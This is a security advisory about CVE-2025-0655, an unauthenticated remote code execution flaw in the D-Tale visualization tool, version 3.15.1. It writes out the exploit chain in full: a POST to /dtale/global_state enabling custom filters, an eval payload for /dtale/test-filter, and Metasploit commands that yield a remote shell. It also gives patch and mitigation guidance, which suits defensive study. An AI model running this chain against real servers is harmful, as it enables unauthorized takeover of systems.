
May 29, 2025
CVE-2025-0655 – Remote Code Execution in D-Tale via Unprotected Custom Filters
A critical remote code execution (RCE) vulnerability in the D-Tale data visualization tool was identified which allowed attackers to execute arbitrary system commands by abusing an exposed API endpoint.
CVE-2025-0655 (now rejected as a duplicate of CVE-2024-55890) originally identified a critical remote code execution (RCE) vulnerability in the D-Tale data visualization tool, specifically affecting version 3.15.1. The flaw allowed unauthenticated attackers to execute arbitrary system commands by enabling a global setting and abusing an exposed API endpoint.
- CVE ID: CVE-2025-0655
- Severity: Critical
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 85.91%
- Published: January 8, 2025
- Affected Versions: 3.15.1
- Patched Version: 3.16.1
The vulnerability lies in how D-Tale handles global configuration settings in its backend. Specifically, the enable_custom_filters flag—which is intended for controlled environments—can be toggled by an attacker via a specially crafted POST request to:
POST /dtale/global_state
{
"enable_custom_filters": true
}
Once this flag is enabled, attackers can access the /dtale/test-filter endpoint, which processes user-supplied filter expressions. This endpoint evaluates Python expressions in an unsafe context, which attackers can manipulate to inject system-level commands.
Example payload to achieve command execution:
{
"data": "__import__('os').system('id')"
}
- No authentication required (in vulnerable configurations)
- D-Tale server must be exposed to external access
- Version 3.15.1 specifically, where protections were not enforced
- enable_custom_filters not locked by server-side policy
While full source context is not public, the vulnerability involves dynamic evaluation of filter expressions:
def test_filter(expr):
    eval(expr)  # Dangerous use of eval()
This code gets exposed via an API route when enable_custom_filters is set to true.
- Send Global State Toggle: Enable enable_custom_filters via a POST request to /dtale/global_state.
- Craft Payload: Use the /dtale/test-filter endpoint to send a malicious payload with embedded system commands.
- Achieve RCE: The payload is evaluated, executing the supplied code in the context of the running server.
Metasploit includes a dedicated module to exploit this vulnerability:
msf > use exploit/linux/http/dtale_rce_cve_2025_0655
msf exploit(dtale_rce_cve_2025_0655) > show targets
...targets...
msf exploit(dtale_rce_cve_2025_0655) > set TARGET <target-id>
msf exploit(dtale_rce_cve_2025_0655) > show options
...configure RHOSTS, RPORT, etc...
msf exploit(dtale_rce_cve_2025_0655) > set RHOSTS <ip>
msf exploit(dtale_rce_cve_2025_0655) > set RPORT <port>
msf exploit(dtale_rce_cve_2025_0655) > run
Once successful, the attacker gains a remote shell with the privileges of the web server user.
- Upgrade: Update to D-Tale version 3.16.1 or newer where this vulnerability is patched.
- Restrict Network Exposure: Ensure D-Tale is only accessible on trusted internal networks.
- Sanitize Input: Avoid enabling dangerous settings like enable_custom_filters in production environments.
- Use WAF: Employ a Web Application Firewall to detect malicious API calls.